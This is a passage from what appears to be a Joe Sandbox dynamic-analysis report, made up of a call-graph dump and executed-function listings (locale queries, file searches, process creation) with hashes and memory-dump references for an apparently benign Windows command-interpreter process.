21753->21768 21754 eff431 ??_V@YAXPAX 21754->21745 21773 ee9144 21755->21773 21758 ee9144 448 API calls 21756->21758 21759 eff3cd 21758->21759 21759->21755 21760 ee78e4 448 API calls 21759->21760 21760->21755 21761 ef2872 21762 ee8e9e 448 API calls 21761->21762 21764 eff3e7 21761->21764 21761->21768 21763 ef28ae 21762->21763 21763->21764 21766 ef054b 448 API calls 21764->21766 21766->21768 21768->21745 21768->21754 21774 eebc30 446 API calls 21773->21774 21797 ee9172 21774->21797 21775 ee91a6 towupper 21775->21797 21776 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21778 ee927e 21776->21778 21777 efbb35 21779 eedcd0 446 API calls 21777->21779 21778->21761 21781 efbb3d 21779->21781 21780 ef0060 5 API calls 21780->21797 21784 f09922 446 API calls 21781->21784 21782 ef054b 446 API calls 21782->21797 21783 efbad3 21787 ee63bd 446 API calls 21783->21787 21786 efba93 21794 f0a53d 446 API calls 21786->21794 21791 ee926f 21787->21791 21788 efb904 21788->21761 21789 ef669f 446 API calls 21789->21797 21791->21776 21793 ee92c2 21798 ee78e4 446 API calls 21793->21798 21794->21783 21795 f0a37a 446 API calls 21795->21797 21797->21775 21797->21777 21797->21780 21797->21782 21797->21783 21797->21786 21797->21788 21797->21789 21797->21791 21797->21793 21797->21795 21797->21797 21799 efba8b 21798->21799 21799->21761 22110 eee7c6 22109->22110 22111 eee7a2 22109->22111 22114 eedc60 2 API calls 22110->22114 22115 eee697 22110->22115 22112 eee7ab wcschr 22111->22112 22111->22115 22113 eee7f4 22112->22113 22112->22115 22116 eedcd0 448 API calls 22113->22116 22114->22115 22115->20940 22115->20945 22122 eee7fe 22116->22122 22117 eee83f 22117->22115 22118 eedc60 2 API calls 22117->22118 22118->22115 22119 eebf70 456 API calls 22119->22122 22120 eedd20 448 API calls 22120->22117 22121 eee8f7 22121->22115 22121->22117 22121->22120 22122->22115 22122->22117 22122->22119 22122->22121 22124 ef1606 lstrcmpW 22123->22124 22125 ef1615 lstrcmpiW 22123->22125 22126 ef160c 22124->22126 22125->22126 22126->20962 22128 ef2998 22127->22128 22129 ef29ff lstrcmpW 22128->22129 22130 ef2a09 lstrcmpiW 22128->22130 22131 ef29a0 22128->22131 22129->22131 22130->22131 22131->20962 22133 eea1bd 22132->22133 22133->21002 22134->21002 22136 ef054b 448 API calls 22135->22136 22190 ef0c22 22136->22190 22137 eebc30 448 API calls 22185 ef0e27 22137->22185 22138 ef0d4a 22141 eedd20 448 API calls 22138->22141 22161 ef0d9e 22138->22161 22139 ef1436 CreateFileW 22142 ef1457 SetFilePointer SetFilePointer 22139->22142 22143 efed11 22139->22143 22140 ef10ae 22140->21061 22144 ef0d6a 22141->22144 22147 eedcd0 448 API calls 22142->22147 22149 ee78e4 448 API calls 22143->22149 22148 eedd20 448 API calls 22144->22148 22145 ef0c93 _wcsnicmp 22150 ef0cac _wcsnicmp 22145->22150 22145->22185 22146 f098b5 453 API calls 22146->22185 22147->22185 22151 ef0d81 22148->22151 22152 efed1e GetLastError 22149->22152 22153 ef0cc7 _wcsnicmp 22150->22153 22154 efebf5 22150->22154 22158 efec27 22151->22158 22151->22161 22152->22140 22155 ef0ce2 _wcsnicmp 22153->22155 22153->22185 22164 ee78e4 448 API calls 22154->22164 22159 ef1131 _wcsnicmp 22155->22159 22155->22190 22156 ef148a ReadFile CloseHandle 22156->22185 22157 efed00 CloseHandle 22157->22140 22160 ee78e4 448 API calls 22158->22160 22168 ef114c _wcsnicmp 22159->22168 22169 ef1563 wcstol 22159->22169 22165 efec33 22160->22165 22161->22137 22161->22185 22162 eedd20 448 API calls 22162->22185 22163 ef12d3 _wpopen 22170 ef12ff feof 22163->22170 22171 efece5 22163->22171 22164->22140 22172 f09922 448 API calls 22165->22172 22166 ef198f 3 API calls 22166->22185 22167 eedc60 GetProcessHeap RtlFreeHeap 22167->22185 22168->22154 22168->22190 22169->22154 22169->22185 22175 ef136e _pclose 22170->22175 22176 ef1313 ferror 22170->22176 22177 ee78e4 448 API calls 22171->22177 22180 efec3b longjmp 22172->22180 22173 eedc60 2 API calls 22173->22190 22174 ef1546 22181 eedc60 2 API calls 22174->22181 22183 eedd20 448 API calls 22175->22183 22176->22175 22176->22185 22182 efecf2 GetLastError 22177->22182 22178 ef134d fgets 22178->22175 22178->22185 22179 efecb3 _pclose 22179->22140 22180->22140 22181->22179 22182->22140 22183->22185 22184 ef054b 448 API calls 22184->22190 22185->22139 22185->22140 22185->22146 22185->22156 22185->22157 22185->22162 22185->22163 22185->22166 22185->22167 22185->22169 22185->22174 22185->22175 22185->22178 22185->22179 22186 ef13db MultiByteToWideChar 22185->22186 22187 ef129a wcstol 22185->22187 22189 ef14e7 feof 22185->22189 22191 eedcd0 448 API calls 22185->22191 22192 ef0f0a wcschr 22185->22192 22193 efecc9 22185->22193 22194 ef0fc8 wcschr 22185->22194 22195 ef0bbb 484 API calls 22185->22195 22197 ef13b7 memmove 22185->22197 22198 ef0f90 wcschr 22185->22198 22186->22185 22187->22154 22187->22185 22188 ef118f wcstol 22188->22154 22188->22190 22189->22176 22189->22185 22190->22138 22190->22145 22190->22161 22190->22173 22190->22184 22190->22185 22190->22187 22190->22188 22191->22185 22192->22185 22196 ee78e4 448 API calls 22193->22196 22194->22185 22195->22185 22196->22140 22197->22185 22198->22185 22200 ee6f39 22199->22200 22212 ee6ea7 22199->22212 22201 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22200->22201 22202 ee6f4e 22201->22202 22202->21061 22203 efa746 22204 f098b5 453 API calls 22203->22204 22205 ee701a 22204->22205 22210 eedcd0 448 API calls 22205->22210 22218 eedc60 2 API calls 22205->22218 22219 f098b5 453 API calls 22205->22219 22220 ef5851 2 API calls 22205->22220 22222 efa7fa 22205->22222 22223 ef198f 3 API calls 22205->22223 22224 ee8b4d 2 API calls 22205->22224 22225 efa806 22205->22225 22228 ee725d 22205->22228 22241 eedd20 448 API calls 22205->22241 22244 ef0bbb 484 API calls 22205->22244 22206 eea62f wcschr 22206->22212 22207 ee6f5d 22208 ef0060 5 API calls 22207->22208 22209 ee6f64 22208->22209 22211 eeacb0 448 API calls 22209->22211 22210->22205 22213 ee6f6b 22211->22213 22212->22200 22212->22203 22212->22206 22212->22207 22214 ef0bbb 484 API calls 22212->22214 22217 ef198f 3 API calls 22212->22217 22215 ef589a 10 API calls 22213->22215 22214->22212 22216 ee6fa6 22215->22216 22216->22205 22221 ee8f21 448 API calls 22216->22221 22217->22212 22218->22205 22219->22205 22220->22205 22229 ee6fbf 22221->22229 22226 eedc60 2 API calls 22222->22226 22223->22205 22224->22205 22227 f09922 448 API calls 22225->22227 22226->22225 22230 efa80b longjmp 22227->22230 22233 efa851 22228->22233 22234 ee7271 22228->22234 22229->22205 22229->22225 22231 eedcd0 448 API calls 22229->22231 22232 efa819 22230->22232 22231->22205 22284 ef21d2 22232->22284 22236 f09a7d 448 API calls 22233->22236 22235 ee8bc7 448 API calls 22234->22235 22238 ee727b GetProcessHeap RtlFreeHeap 22235->22238 22239 efa85c 22236->22239 22242 ee72ee 8 API calls 22238->22242 22240 efa824 22245 ef1e70 448 API calls 22240->22245 22248 efa835 exit 22240->22248 22241->22205 22243 ee7294 22242->22243 22283 ee72c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22243->22283 22244->22205 22245->22240 22247 ee729c GetProcessHeap RtlFreeHeap 22249 ee72bc 22247->22249 22248->22228 22249->21061 22251 eea7db 22250->22251 22251->21052 22251->22251 22288 eeb45a 22252->22288 22255 f0769e 458 API calls 22256 efebcc 22255->22256 22257 f03b4e 448 API calls 22256->22257 22258 efebd5 22257->22258 22259 ee9950 448 API calls 22258->22259 22260 ef0bd6 22259->22260 22260->21070 22264 f03ea6 22261->22264 22262 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22263 f0418b 22262->22263 22263->21061 22265 eedcd0 448 API calls 22264->22265 22278 f0416f 22264->22278 22270 f03ef9 22265->22270 22266 ee6e57 498 API calls 22267 f03f70 22266->22267 22268 eedc60 2 API calls 22267->22268 22269 f03f7b 22268->22269 22271 eedcd0 448 API calls 22269->22271 22270->22266 22270->22278 22272 f03fa4 22271->22272 22273 f03fe2 FindFirstFileW 22272->22273 22272->22278 22274 f04164 22273->22274 22282 f04006 22273->22282 22276 eedc60 2 API calls 22274->22276 22275 f0413c FindNextFileW 22277 f04153 FindClose 22275->22277 22275->22282 22276->22278 22277->22274 22278->22262 22280 eedd20 448 API calls 22280->22282 22281 f03e66 498 API calls 22281->22282 22282->22275 22282->22277 22282->22280 22282->22281 22283->22247 22285 ef21df 22284->22285 22286 ef21d6 22284->22286 22285->22240 22286->22285 22287 eff25c SetConsoleTitleW 22286->22287 22287->22240 22297 eeb46c 22288->22297 22289 eeb484 22305 eeb4bf 22289->22305 22306 eeb5b0 22289->22306 22290 eeb45a 474 API calls 22293 eeb4d2 22290->22293 22291 eeb53c 22291->22289 22295 eeb4c8 22291->22295 22291->22305 22298 eeb45a 474 API calls 22293->22298 22293->22305 22295->22290 22295->22305 22296 eeb5b0 474 API calls 22296->22297 22297->22289 22297->22291 22297->22295 22297->22296 22301 eeb45a 474 API calls 22297->22301 22297->22305 22300 eeb4e4 22298->22300 22299 eeb5b0 474 API calls 22302 eeb4a5 22299->22302 22304 eeb5b0 474 API calls 22300->22304 22300->22305 22301->22297 22303 eeb5b0 474 API calls 22302->22303 22302->22305 22303->22302 22304->22300 22305->22255 22305->22260 22307 eeb490 22306->22307 22308 eeb5c8 22306->22308 22307->22299 22307->22305 22308->22307 22309 eedcd0 448 API calls 22308->22309 22314 eeb5eb 22309->22314 22310 eeb631 22310->22307 22311 eedd20 448 API calls 22310->22311 22311->22307 22312 ef01f5 wcsrchr 22312->22314 22313 eeee03 474 API calls 22313->22314 22314->22307 22314->22310 22314->22312 22314->22313 22380 ef7d90 22315->22380 22317 ee9467 InitializeProcThreadAttributeList 22318 ee94b8 UpdateProcThreadAttribute 22317->22318 22319 efbdf1 GetLastError 22317->22319 22321 efbe0d GetLastError 22318->22321 22322 ee94e7 memset memset GetStartupInfoW 22318->22322 22392 f05c54 22319->22392 22324 f05c54 448 API calls 22321->22324 22323 ef1d90 451 API calls 22322->22323 22326 ee9579 22323->22326 22327 efbe1f DeleteProcThreadAttributeList 22324->22327 22325 efbe03 22325->22321 22329 eeacb0 448 API calls 22326->22329 22328 efbe5c 22327->22328 22328->21102 22331 ee9589 22329->22331 22330 efbe49 _local_unwind4 22330->22328 22331->22330 22332 ef01f5 wcsrchr 22331->22332 22333 ee95c6 22331->22333 22334 ee95ae 22332->22334 22381 ee8235 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22333->22381 22334->22333 22335 ee95b2 lstrcmpW 22334->22335 22335->22333 22337 efbe83 22335->22337 22397 f050d8 22337->22397 22338 ee95cb 22340 ee95d8 22338->22340 22341 ee9711 CreateProcessAsUserW 22338->22341 22342 efbec4 22340->22342 22343 ee95e5 CreateProcessW 22340->22343 22344 ee9608 22341->22344 22345 efbece GetLastError 22342->22345 22343->22344 22344->22345 22346 ee9612 CloseHandle 22344->22346 22349 ee963a 22345->22349 22348 eea976 8 API calls 22346->22348 22348->22349 22351 ef72ef ApiSetQueryApiSetPresence 22349->22351 22355 ee9642 22349->22355 22358 efbf0a 22349->22358 22351->22358 22358->22355 22375 ef21d2 SetConsoleTitleW 22374->22375 22376 ef21c0 22375->22376 22376->21107 22378 ef21d2 SetConsoleTitleW 22377->22378 22379 ef21cc 22378->22379 22379->21107 22380->22317 22381->22338 22396 f05c6a 22392->22396 22393 f05d93 22393->22325 22394 ee78e4 448 API calls 22395 f05dfe 22394->22395 22395->22325 22396->22393 22396->22394 22398 ef1d90 451 API calls 22397->22398 22399 f050e8 22398->22399 22479 f013ca 22478->22479 22480 ef56e2 22478->22480 22482 f0126a longjmp 22479->22482 22486 f013e2 22479->22486 22503 f0155c 22479->22503 22504 f014e7 22479->22504 22481 ef56ef 22480->22481 22488 f01303 22480->22488 22493 f01256 22480->22493 22539 ef5726 22481->22539 22485 f01277 22482->22485 22484 ef5726 449 API calls 22524 f012fb 22484->22524 22489 ef5726 449 API calls 22485->22489 22490 f01433 22486->22490 22495 f013e7 22486->22495 22487 ef56fe 22492 ef5711 22487->22492 22497 ef5726 449 API calls 22487->22497 22491 ef5726 449 API calls 22488->22491 22514 f01288 22489->22514 22500 ef57c9 449 API calls 22490->22500 22510 f01316 22491->22510 22551 ef57c9 22492->22551 22493->22481 22493->22485 22494 f01264 22493->22494 22494->22482 22494->22490 22495->22482 22501 f013fc 22495->22501 22496 ef5726 449 API calls 22496->22503 22497->22492 22499 ef56c4 449 API calls 22506 f01583 22499->22506 22516 f0143b 22500->22516 22511 ef5726 449 API calls 22501->22511 22502 f0136e 22508 ef5726 449 API calls 22502->22508 22503->22484 22504->22496 22505 ef571d 22505->21114 22506->21114 22507 f01471 22509 ef56c4 449 API calls 22507->22509 22512 f01380 22508->22512 22515 f014c2 22509->22515 22510->22502 22525 ef5726 449 API calls 22510->22525 22529 f01326 22510->22529 22511->22505 22518 ef5726 449 API calls 22512->22518 22513 f012c7 22520 ef56c4 449 API calls 22513->22520 22514->22513 22519 ef5726 449 API calls 22514->22519 22521 ef5726 449 API calls 22515->22521 22516->22507 22530 f0147a 22516->22530 22531 f0145c 22516->22531 22517 ef5726 449 API calls 22517->22502 22522 f01390 22518->22522 22519->22513 22523 f012d6 22520->22523 22521->22524 22526 ef5726 449 API calls 22522->22526 22527 ef56c4 449 API calls 22523->22527 22524->22499 22524->22505 22525->22529 22532 f0139f 22526->22532 22528 f012e3 22527->22528 22528->22505 22535 ef5726 449 API calls 22528->22535 22529->22502 22529->22517 22533 ef5726 449 API calls 22530->22533 22531->22507 22536 ef5726 449 API calls 22531->22536 22534 ef5726 449 API calls 22532->22534 22533->22507 22537 f013b0 22534->22537 22535->22524 22536->22507 22538 ef5726 449 API calls 22537->22538 22538->22524 22540 ef573f 22539->22540 22541 ee78e4 448 API calls 22540->22541 22546 ef5781 22540->22546 22542 f0159e longjmp 22541->22542 22543 f015ae 22542->22543 22544 ef5726 448 API calls 22543->22544 22545 f015c9 22544->22545 22547 ef5726 448 API calls 22545->22547 22546->22487 22548 f015f4 22547->22548 22549 ef5726 448 API calls 22548->22549 22550 f01603 22549->22550 22550->22487 22552 ef57e4 22551->22552 22553 f015ae 22551->22553 22552->22505 22554 ef5726 449 API calls 22553->22554 22555 f015c9 22554->22555 22556 ef5726 449 API calls 22555->22556 22557 f015f4 22556->22557 22558 ef5726 449 API calls 22557->22558 22559 f01603 22558->22559 22559->22505 22561 ef1eb2 22560->22561 22562 ef1ebc 22561->22562 22563 eff110 22561->22563 22565 ef1eef 22561->22565 22562->18680 22564 ef72ef ApiSetQueryApiSetPresence 22563->22564 22567 eff12e 22564->22567 22565->22562 22566 eff15b realloc 22565->22566 22566->22562 22567->18680 22569 ef6474 22568->22569 22570 ef6464 NtOpenProcessToken 22568->22570 22571 ef62fa 22569->22571 22578 ef6500 NtQueryInformationToken 22569->22578 22570->22569 22571->18692 22571->18693 22574 ef64a8 22574->22571 22575 ef64bc NtClose 22574->22575 22575->22571 22577->18704 22579 ef6534 22578->22579 22581 ef648a 22578->22581 22580 f02018 NtQueryInformationToken 22579->22580 22579->22581 22580->22581 22581->22574 22582 ef64ca NtQueryInformationToken 22581->22582 22583 ef64f3 22582->22583 22583->22574

                                                                                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                                                                                      Function 00EE8572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 165 ee8572-ee85a6 call ee8791 GetLocaleInfoW 168 ee85ac-ee85c4 GetLocaleInfoW 165->168 169 efb2f9-efb300 165->169 171 ee85c6-ee85cb 168->171 172 ee8602-ee861c GetLocaleInfoW 168->172 170 efb302-efb30a 169->170 175 efb30c-efb313 170->175 176 efb320-efb322 170->176 177 ee85d1-ee85d7 171->177 173 ee863e-ee865e GetLocaleInfoW 172->173 174 ee861e-ee8628 172->174 180 ee8673-ee8685 GetLocaleInfoW 173->180 181 ee8660-ee8667 173->181 178 ee862e-ee8634 174->178 179 efb331-efb334 174->179 175->176 182 efb315-efb31e 175->182 183 efb327-efb329 176->183 184 efb324 176->184 185 ee85dd-ee85e0 177->185 186 ee8787-ee8789 177->186 178->173 192 efb358-efb36c 179->192 193 efb336-efb339 179->193 188 ee868b-ee86a0 GetLocaleInfoW 180->188 189 efb371-efb378 180->189 181->180 187 ee8669 181->187 182->170 182->176 183->179 184->183 190 ee85fb-ee85fd 185->190 191 ee85e2-ee85ea 185->191 186->169 187->180 195 efb3a9-efb3b0 188->195 196 ee86a6-ee86b8 GetLocaleInfoW 188->196 194 efb37a-efb382 189->194 190->172 191->186 197 ee85f0-ee85f9 191->197 192->173 193->173 198 efb33f-efb353 193->198 199 efb398-efb39a 194->199 200 efb384-efb38b 194->200 203 efb3b2-efb3ba 195->203 201 ee86be-ee86d0 GetLocaleInfoW 196->201 202 efb3e1-efb3e8 196->202 197->177 197->190 198->173 206 efb39f-efb3a1 199->206 207 efb39c 199->207 200->199 205 efb38d-efb396 200->205 208 efb419-efb420 201->208 209 ee86d6-ee86e8 GetLocaleInfoW 201->209 204 efb3ea-efb3f2 202->204 210 efb3bc-efb3c3 203->210 211 efb3d0-efb3d2 203->211 212 efb408-efb40a 204->212 213 efb3f4-efb3fb 204->213 205->194 205->199 206->195 207->206 214 efb422-efb42a 208->214 215 ee86ee-ee8700 GetLocaleInfoW 209->215 216 efb451-efb458 209->216 210->211 217 efb3c5-efb3ce 210->217 218 efb3d7-efb3d9 211->218 219 efb3d4 211->219 222 efb40f-efb411 212->222 223 efb40c 212->223 213->212 221 efb3fd-efb406 213->221 224 efb42c-efb433 214->224 225 efb440-efb442 214->225 226 efb489-efb490 215->226 227 ee8706-ee8718 GetLocaleInfoW 215->227 220 efb45a-efb462 216->220 217->203 217->211 218->202 219->218 228 efb478-efb47a 220->228 229 efb464-efb46b 220->229 221->204 221->212 222->208 223->222 224->225 231 efb435-efb43e 224->231 234 efb447-efb449 225->234 235 efb444 225->235 230 efb492-efb49a 226->230 232 ee871e-ee8730 GetLocaleInfoW 227->232 233 efb4c1-efb4c8 227->233 238 efb47f-efb481 228->238 239 efb47c 228->239 229->228 237 efb46d-efb476 229->237 240 efb49c-efb4a3 230->240 241 efb4b0-efb4b2 230->241 231->214 231->225 242 efb4f9-efb4fe 232->242 243 ee8736-ee874b GetLocaleInfoW 232->243 236 efb4ca-efb4d2 233->236 234->216 235->234 244 efb4e8-efb4ea 236->244 245 efb4d4-efb4db 236->245 237->220 237->228 238->226 239->238 240->241 247 efb4a5-efb4ae 240->247 248 efb4b7-efb4b9 241->248 249 efb4b4 241->249 246 efb500-efb508 242->246 250 efb52f-efb536 243->250 251 ee8751-ee8763 GetLocaleInfoW 243->251 254 efb4ef-efb4f1 244->254 255 efb4ec 244->255 245->244 253 efb4dd-efb4e6 245->253 256 efb51e-efb520 246->256 257 efb50a-efb511 246->257 247->230 247->241 248->233 249->248 252 efb538-efb540 250->252 258 ee8769-ee8786 setlocale call ef6b30 251->258 259 efb567-efb56c 251->259 261 efb556-efb558 252->261 262 efb542-efb549 252->262 253->236 253->244 254->242 255->254 265 efb525-efb527 256->265 266 efb522 256->266 257->256 264 efb513-efb51c 257->264 263 efb56e-efb576 259->263 269 efb55d-efb55f 261->269 270 efb55a 261->270 262->261 268 efb54b-efb554 262->268 271 efb58c-efb58e 263->271 272 efb578-efb57f 263->272 264->246 264->256 265->250 266->265 268->252 268->261 269->259 270->269 274 efb593-efb595 271->274 275 efb590 271->275 272->271 273 efb581-efb58a 272->273 273->263 273->271 275->274
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00EE6906,0000001F,?,00000080), ref: 00EE8791
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNELBASE(00000000,0000001E,00F1C9E0,00000008), ref: 00EE859E
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00EE85BC
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00EE8614
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00EE8653
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00F1C9D0,00000008), ref: 00EE867D
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00F1C970,00000020), ref: 00EE8698
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00F1C930,00000020), ref: 00EE86B0
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00F1C8F0,00000020), ref: 00EE86C8
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00F1C8B0,00000020), ref: 00EE86E0
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00F1C870,00000020), ref: 00EE86F8
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00F1C830,00000020), ref: 00EE8710
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00F1C7F0,00000020), ref: 00EE8728
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00F1C9C0,00000008), ref: 00EE8743
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00F1C9B0,00000008), ref: 00EE875B
                                                                                                                                                                                                                                                                                                                                                      • setlocale.MSVCRT ref: 00EE8770
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 78ec07200899fd453fd130b2092a467927ae0ed91a6c941f6058417222a7ca24
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6333f41f0c198b6afdea2de0473a7a649ea6674d240ac07b9ce8d757a8bb0c60
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78ec07200899fd453fd130b2092a467927ae0ed91a6c941f6058417222a7ca24
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61C1222170025E96DB304F36CE0977B37ADAF90758F24312AEA0AFB185EB64C941D760
                                                                                                                                                                                                                                                                                                                                                      Function 00EF0207 Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 833 ef0207-ef0236 834 ef0239-ef0242 833->834 834->834 835 ef0244-ef024a 834->835 836 ef037d 835->836 837 ef0250-ef0255 835->837 841 efe739-efe750 _wcsicmp 836->841 838 ef0259-ef0263 837->838 839 ef028c-ef02a9 FindFirstFileW 838->839 840 ef0265-ef0268 838->840 845 ef02af-ef02bf FindClose 839->845 846 efe798-efe79b 839->846 840->839 842 ef026a-ef0270 840->842 843 efe756-efe75d 841->843 844 ef02c5-ef02cf 841->844 842->838 848 ef0272-ef0289 call ef6b30 842->848 847 ef02d2-ef02dd 844->847 845->844 849 ef034d-ef0351 845->849 847->847 850 ef02df-ef02f7 847->850 849->843 851 ef0357-ef0372 _wcsnicmp 849->851 850->836 853 ef02fd-ef02ff 850->853 851->844 854 ef0378 851->854 856 ef0305-ef0348 memcpy call eef3a0 853->856 857 efe762-efe764 853->857 854->841 856->842 859 efe767-efe772 857->859 859->859 861 efe774-efe791 memmove 859->861 861->846
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00EF0297
                                                                                                                                                                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00EF02B0
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 00EF0311
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00EF0367
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EFE746
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 242869866-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4d7ec5449e85fb795fa48769c5bbe32a8a576a3ce29ffab64093834999a4a563
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e3f5f76fdb0a7a0c937621f7bac635b6acc2a0c9b3ee309ec855ac8a578a7bda
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d7ec5449e85fb795fa48769c5bbe32a8a576a3ce29ffab64093834999a4a563
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A51C3756083058BC724DF28DC485BBB7E5EFC8314F54491EFA89A3291E731E905CB96
                                                                                                                                                                                                                                                                                                                                                      Function 00EEA9D4 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00EEA9C5), ref: 00EEA9D8
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00EEA9F3
                                                                                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EEA9FA
